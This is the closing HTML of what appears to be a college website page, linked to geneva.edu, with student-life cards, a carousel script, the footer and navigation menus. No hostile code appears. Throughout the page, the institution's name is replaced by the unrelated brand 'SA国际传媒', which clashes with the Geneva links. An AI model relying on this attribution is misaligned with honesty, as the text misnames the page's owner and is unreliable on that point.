                	        	<div class="content-card"><a href="/student-life/commuters/academics/programs/css/engagement/index.php" target="_blank"> <img alt="Image of Center for Student Engagement" src="/student-life/commuters/academics/programs/css/engagement/_assets/thumb-engagement.jpg" /></a>
            <div class="card-text">
                        <h3>Center for Student Engagement</h3>
                        <p>Through meaningful traditions, innovative programming, and student leadership experiences, students connect with others, and invest in the campus and local community. </p>            </div>
            </div>
                            	        	<div class="content-card"><a href="/student-life/commuters/academics/programs/css/academic-support/index.php" target="_blank"> <img alt="Image of Academic Support" src="/student-life/commuters/academics/programs/css/academic-support/_assets/thumnbnail-academic-support.jpg" /></a>
            <div class="card-text">
                        <h3>Academic Support</h3>
                        <p>Our support services promote academic strength in your lifelong journey of discovery. Students here enjoy an environment where learning is a shared and encouraging experience. You were made to learn and live courageously, and we are here to help you discern God's purpose and calling in your life's work.</p>            </div>
            </div>
                            	        	<div class="content-card"><a href="/student-life/commuters/academics/programs/css/wellness/index.php" target="_blank"> <img alt="Image of Health and Wellness" src="/student-life/commuters/academics/programs/css/wellness/health/_assets/_assets/health-and-wellness_thumbnail.jpg" /></a>
            <div class="card-text">
                        <h3>Health and Wellness</h3>
                        <p>While your focus may be on academics, athletics, or your future beyond college, we know that seeking a sense of balance in your physical and mental health will lead to the best possible outcome as you pursue your dreams and goals. </p>            </div>
            </div>
                       </div>
<!-- end carousel--></div>
<!-- end Stories--></div>
<script>
jQuery(document).ready(function(){
    jQuery(".scroller-stories").owlCarousel({
        center: false,
        items:1,
        margin:25,
        dots:true,
        responsive:{
            800:{
                items:2
            },
            1000:{
                items:3
            }
        }
    });
});
</script>

                 
                 
                 
                 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                 


<!-- Apply -->
<div class="section poppins apply">
<div class="container">
<div class="row">
<div class="twelve columns center">
<h2>Take the next step...</h2>
<p class="largetext">There is a place for you at SA国际传媒.</p>
<a class="button gold large normal" href="none">Apply Today</a></div>
</div>
</div>
</div>
<!-- End Apply -->




                </div>
                
                <!-- end div pageContent --><br class="clearit" />
                </div>
                	<!-- end pageContentFull -->
                </div>
          <!-- end contentSpace div-->
          <div id="footerBar" ></div>
          <div id="footerSpace">
              <!-- Footer Include Here-->
             <div>
<div class="footerGradient">
<div class="wide-container" id="footerContainer">
<div class="row">
<div class="four columns" id="footerLeft"><img alt="" aria-hidden="true" class="u-full-width" height="152" src="/_files/sitegraphics/geneva-spade-stacked.svg" style="max-width: 200px;" width="200"/>
<div id="socialfooter">
<ul class="socialicons">
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Facebook (Opens in new tab)"> <i class="fa-brands fa-facebook-square"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on X (Opens in new tab)"> <i class="fa-brands fa-twitter"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Instagram (Opens in new tab)"> <i class="fa-brands fa-instagram"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Youtube (Opens in new tab)"> <i class="fa-brands fa-youtube"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on LinkedIn (Opens in new tab)"> <i class="fa-brands fa-linkedin-in"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on TikTok (Opens in new tab)"> <i class="fa-brands fa-tiktok">&nbsp;</i></a></li>
</ul>
</div>
<div class="pad20 buttonflex"><a class="quickbtn" href="/about-geneva/contact_us.php"><i class="fa fa-phone">&#160;</i>Contact Us</a><a class="quickbtn" href="/about-geneva/campus_map.php"><i class="fas fa-map-marker-alt"></i>&#160;Campus Map</a></div>
</div>
<!-- end footer left-->
<div class="eight columns" id="footerRight">
<div class="flex-foot">
<div class="footerGroup">
<div class="toggleHead hidToggle">General Information</div>
<ul class="hidFootLinks">
<li><a href="/about-geneva/foundationalconcepts.php">Foundational Concepts</a></li>
<li><a href="/about-geneva/nondiscrimination_policy.php">Nondiscrimination Policy</a></li>
<li><a href="/about-geneva/titleix/index.php">Title IX</a></li>
<li><a href="/employment/index.php">Employment</a></li>
<li><a href="/about-geneva/attribution.php">Attribution</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Offices &amp; Departments</div>
<ul class="hidFootLinks">
<li><a href="/academics/registrar/index.php">Registrar</a></li>
<li><a href="/student-accounts/index.php">Student Accounts</a></li>
<li><a href="/admissions/undergraduate.php">Admissions</a></li>
<li><a href="/academics/crossroads/index.php">Crossroads</a></li>
<li><a href="/academics/index.php">Academic Programs</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Student Resources</div>
<ul class="hidFootLinks">
<li><a href="/library/index.php">McCartney Library</a></li>
<li><a href="/about-geneva/campus_bookstore.php">Campus Bookstore</a></li>
<li><a href="/about-geneva/policies/index.php">Academic Policies</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" src="/_files/sitegraphics/moodle-ico.png"/> Online Course Login</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" height="16" src="/_files/sitegraphics/mygen-ico.png" style="display: inline-block; vertical-align: middle;" width="20"/> myGeneva Student Portal</a></li>
</ul>
</div>
<!--<div class="footerGroup">
<div class="toggleHead hidToggle">ALUMNI &amp; FRIENDS</div>
<ul class="hidFootLinks">
<li><a href="/alumni/index">Alumni Relations</a></li>
<li><a href="/alumni/online-services/class-notes/">Alumni Class Notes</a></li>
<li><a href="/alumni/events/index">Alumni Events</a></li>
<li><a href="/give/index">Give</a></li>
</ul>
</div>--> <a class="BackToTop" href="#topOfPageLink"><img alt="" aria-hidden="true" src="/_files/sitegraphics/to-top-sm.png"/></a></div>
<!-- end footerRight --></div>
<!-- end row --></div>
<!-- end footer container --></div>
<!-- end footer gradient --></div>
<div class="footer-end">
<div class="motto-margin">
<div class="pad20"><img alt="" aria-hidden="true" class="u-full-width" height="26" src="/_files/sitegraphics/motto-dark.svg" style="max-width: 250px;" width="250"/></div>
<div class="pad20">
<p class="copyright">&#169; SA国际传媒 | All rights reserved</p>
</div>
</div>
</div>


</div>          </div>
        </div><!--end .bg-blur wrap-->
          <!-- Offcanvas Menu Include Here-->
          <div>

	
	<!-- RESPONSIVE MENU ============================================== -->
	<nav id="menu">
		<ul>
			<div id="searchBox-menu" class="roundcorners">
				<form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
					<div id="searchFld-menu">
						<input class="searchTxt-menu" id="fldsearch" name="q" style="background-color: transparent;" tabindex="1" type="text" placeholder="Search Geneva" />
						<input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" />
						<input name="cof" type="hidden" value="FORID:11" />
						<input name="sa" type="hidden" value="Search" />
						<!-- <input class="searchButton-menu" name="input" src="https://www.geneva.edu/_files/sitegraphics/searchico32.png" type="image" value="Search Geneva" /> -->
						<button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;">
							<i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 50%;"></i>
						</button>
					</div>
				<input type="hidden" name="as_sfid" value="AAAAAAVk4Ma-SPfLSEYHOqWWUIlbCc4lnW55nt7PfKbhyO_Skl5ktV6lMHzgzjDDjQcqI_1Gwxt04bE3dE1yEC0aWiDYaX_NtgW8p_5ZjUk7R9DAowteXjrBLAwBtRoLOdrWGfU=" /><input type="hidden" name="as_fid" value="790cfbd3d7de82efd3e2f3890ce8cf5ee69d8e1b" /></form>
			</div>
			<!-- end searchBox-menu-->
			<li>
				<span>SA国际传媒</span>
				<ul>
					<li>
						<a href="/about-geneva/">Fast Facts &amp; Overview</a>
					</li>
					<li>
						<a href="/about-geneva/identity/">Geneva Identity</a>
					</li>
					<li>
						<a href="/about-geneva/policies/">Academic Policies</a>
					</li>
					<li>
						<a href="/about-geneva/leadership">Leadership</a>
					</li>
					<li>
						<a href="/articles/">Stories, Blogs &amp; Articles</a>
					</li>
					<li>
						<a href="/calendar/">Calendar of Events</a>
					</li>
				</ul>
			</li>
			<li>
				<span>Academics</span>
				<ul>
					<li><a href="/academics/">Explore Academics</a></li>
                    <li><a href="/academics/programs/">Search Degree Programs</a></li>
                    <li><a href="/academics/core">Core Curriculum</a></li>
                    <li><a href="/academics/honors/">Honors Program</a></li>
                    <li><a href="/graduate/">Graduate Programs</a></li>
                    <li><a href="/online-degree/">Online Degree Programs</a></li>
                    <li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
                    <li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
                    <li><a href="/cfl/">Center for Faith &amp; Life</a></li>
				</ul>
			</li>
			<li>
				<a aria-haspopup="true">
					<span>Admissions &amp; Aid</span>
				</a>
				<ul>
				    <li><a href="/financial-aid/tug-financial-aid">Undergraduate</a></li>
                    <li><a href="/graduate/admissions/">Graduate</a></li>
                    <li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
                    <li><a href="/admissions/visit/">Visit Geneva</a></li>
                    <li><a href="/admissions/international/">International Students</a></li>
                    <li><a href="/admissions/transfers/">Transfer Students</a></li>
                    <li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
                    <li><a href="/admissions/military/">Military &amp; Veterans</a></li>
				</ul>
			</li>
			<li>
				<span>Student Life</span>
				<ul>
				<li>
						<a href="/student-life/">Student Life Home</a>
					</li>
					<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
                    <li><a href="/calling-career/">Calling &amp; Career</a></li>
                    <li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
                    <li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
                    <li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
                    <li><a href="/student-life/campus-safety/">Campus Safety</a></li>
                    <li><a href="/student-life/academic-support/">Academic Support</a></li>
                    <li><a href="/student-life/commuters">Commuter Life</a></li>
                    <li><a href="/student-life/student-resources">Student Resources</a></li>
				</ul>
			</li>
			<li>
				<span>Alumni</span>
				<ul>
					<li>
						<a href="none">Giving</a>
					</li>
					<li>
						<a href="/alumni/">Alumni Home</a>
					</li>
					<li>
						<a href="/alumni/events/">Alumni Events</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni-update-form">Alumni Update Form</a>
					</li>
					<li>
						<a href="/academics/registrar/student_records_transcripts">Transcript Requests</a>
					</li>
					<li>
						<a href="/alumni/represent/alumni_referrals">Gold and White Referrals</a>
					</li>
					<li>
						<a href="/alumni/represent/legacylink">Legacy Link Program</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni_contact">Contact Alumni Engagement</a>
					</li>
					<!--<li>
						<a href="/homecoming/">Homecoming 2025</a>
					</li>-->
				</ul>
			</li>
			<li>
				<a href="none">
					<span>Athletics</span>
				</li>
			</li>
			<div class="mmenu-undernav">&copy; SA国际传媒 | 
				<a href="/about-geneva/contact_us">Contact Us</a>
			</div>
			<div class="searchBox-panel2"></div>
		</ul></nav>
<!-- Hidden Modal Search --> 
<!--<a href="#modalsearch">Search Geneva.edu</a>-->
<div id="search-box"><a class="close" href="#close"></a>
<div class="container">
<div class="search-main">
<div class="search-inner"><form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng"><input id="inputSearch" name="q" placeholder="Search Geneva.edu" type="text" /> <input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" /> <input name="cof" type="hidden" value="FORID:11" /> <button class="search-glass" style="cursor: pointer; background: none; overflow: hidden;"> <i aria-hidden="true" class="fa-xl fa-solid fa-magnifying-glass" style="color: #c99a2c;"></i> </button><input type="hidden" name="as_sfid" value="AAAAAAXgWaZ9lXmVHnYKQhKYTC4AMESE57V8OAiBasuVYLBaDGENN24ufE3sru76aRnp-zlrxhVZlAGYgUrTSs-yDw1vN2utiP7JCpqo532QepNcfveazPUUT5kUeNtrGaLsBG8=" /><input type="hidden" name="as_fid" value="f94d1c801f28ffb327e12cc9196445e6031ac50c" /></form><span class="search-info">Hit enter to search or ESC to close</span></div>
</div>
</div>
</div>
<!-- end Hidden Modal Search -->

	


</div>           
          
          <!-- include External Jquery last -->
          
          
           
		<!-- Final JS files Include Here-->
		<div>

	

<script src="none" type="text/javascript"></script>
<!-- ADDITIONAL STYLES AND SCRIPTS ========================== -->
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>




</div>          
   </body>
</html>